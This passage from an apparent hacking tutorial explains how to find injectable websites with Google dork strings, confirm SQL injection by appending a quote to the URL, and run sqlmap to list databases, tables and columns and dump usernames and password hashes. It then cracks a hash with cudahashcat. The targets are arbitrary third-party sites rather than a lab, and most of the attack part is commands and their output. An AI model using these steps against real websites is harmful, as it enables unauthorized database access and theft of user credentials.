inurl:announce.php?id=	inurl:viewphoto.php?id=
inurl:chappies.php?id=	inurl:article.php?id=
inurl:read.php?id=	inurl:person.php?id=
inurl:viewapp.php?id=	inurl:productinfo.php?id=
inurl:viewphoto.php?id=	inurl:showimg.php?id=
inurl:rub.php?idr=	inurl:view.php?id=
inurl:galeri_info.php?l=	inurl:website.php?id=

Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection

For every string show above, you will get huundreds of search results. How do you know which is really vulnerable to SQLMAP SQL Injection. There’s multiple ways and I am sure people would argue which one is best but to me the following is the simplest and most conclusive.

Let’s say you searched using this string inurl:item_id= and one of the search result shows a website like this:

http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15

Just add a single quotation mark ' at the end of the URL. (Just to ensure, " is a double quotation mark and ' is a single quotation mark).

So now your URL will become like this:

http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'

If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirect you to a different page, move on to the next site in your Google search results page.

See example error below in the screenshot. I’ve obscured everything including URL and page design for obvious reasons.

Examples of SQLi Errors from Different Databases and Languages

Microsoft SQL Server

Server Error in ‘/’ Application. Unclosed quotation mark before the character string ‘attack;’.

Description: An unhanded exception occurred during the execution of the current web request. Please review the stack trace for more information about the error where it originated in the code.

Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string ‘attack;’.

MySQL Errors

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore.com/buystuff.php on line 12

Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’ at line 12

Oracle Errors

java.sql.SQLException: ORA-00933: SQL command not properly ended at oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)

Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated

PostgreSQL Errors

Query failed: ERROR: unterminated quoted string at or near “‘’’”

Step 2: List DBMS databases using SQLMAP SQL Injection

As you can see from the screenshot above, I’ve found a SQLMAP SQL Injection vulnerable website. Now I need to list all the databases in that Vulnerable database. (this is also called enumerating number of columns). As I am using SQLMAP, it will also tell me which one is vulnerable.

Run the following command on your vulnerable website with.

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs

In here:
sqlmap = Name of sqlmap binary file
-u = Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15″)
--dbs = Enumerate DBMS databases

See screenshot below.

This commands reveals quite a few interesting info:

web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'

So, we now have two database that we can look into. information_schema is a standard database for almost every MYSQL database. So our interest would be on sqldummywebsite database.

Step 3: List tables of target database using SQLMAP SQL Injection

Now we need to know how many tables this sqldummywebsite database got and what are their names. To find out that information, use the following command:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables

Sweet, this database got 8 tables.

[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info

and of course we want to check whats inside user_info table using SQLMAP SQL Injection as that table probably contains username and passwords.

Step 4: List columns on target table of selected database using SQLMAP SQL Injection

Now we need to list all the columns on target table user_info of sqldummywebsite database using SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy, run the following command:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns

This returns 5 entries from target table user_info of sqldummywebsite database.

[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)

AHA! This is exactly what we are looking for … target table user_login and user_password .

Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection

SQLMAP SQL Injection makes is Easy! Just run the following command again:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump

Guess what, we now have the username from the database:

[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes

Almost there, we now only need the password to for this user.. Next shows just that..

Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection

You’re probably getting used to on how to use SQLMAP SQL Injection tool. Use the following command to extract password for the user.

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump

TADA!! We have password.

[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+

But hang on, this password looks funny. This can’t be someone’s password.. Someone who leaves their website vulnerable like that just can’t have a password like that.

That is exactly right. This is a hashed password. What that means, the password is encrypted and now we need to decrypt it.

I have covered how to decrypt password extensively on this Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux post. If you’ve missed it, you’re missing out a lot.

I will cover it in short here but you should really learn how to use hashcat.

Step 7: Cracking password

So the hashed password is 24iYBc17xK0e. . How do you know what type of hash is that?

Step 7.a: Identify Hash type

Luckily, Kali Linux provides a nice tool and we can use that to identify which type of hash is this. In command line type in the following command and on prompt paste the hash value:

hash-identifier

Excellent. So this is DES(Unix) hash.

Step 7.b: Crack HASH using cudahashcat

First of all I need to know which code to use for DES hashes. So let’s check that:

cudahashcat --help | grep DES

So it’s either 1500 or 3100. But it was a MYSQL Database, so it must be 1500.

I am running a Computer thats got NVIDIA Graphics card. That means I will be using cudaHashcat. On my laptop, I got an AMD ATI Graphics cards, so I will be using oclHashcat on my laptop. If you’re on VirtualBox or VMWare, neither cudahashcat nor oclhashcat will work. You must install Kali in either a persisitent USB or in Hard Disk. Instructions are in the website, search around.

I saved the hash value 24iYBc17xK0e. in DES.hash file. Following is the command I am running:

cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt

Interesting find: Usuaul Hashcat was unable to determine the code for DES hash. (not in it’s help menu). Howeverm both cudaHashcat and oclHashcat found and cracked the key.

Anyhow, so here’s the cracked password: abc123. 24iYBc17xK0e.:abc123

Sweet, we now even have the password for this user.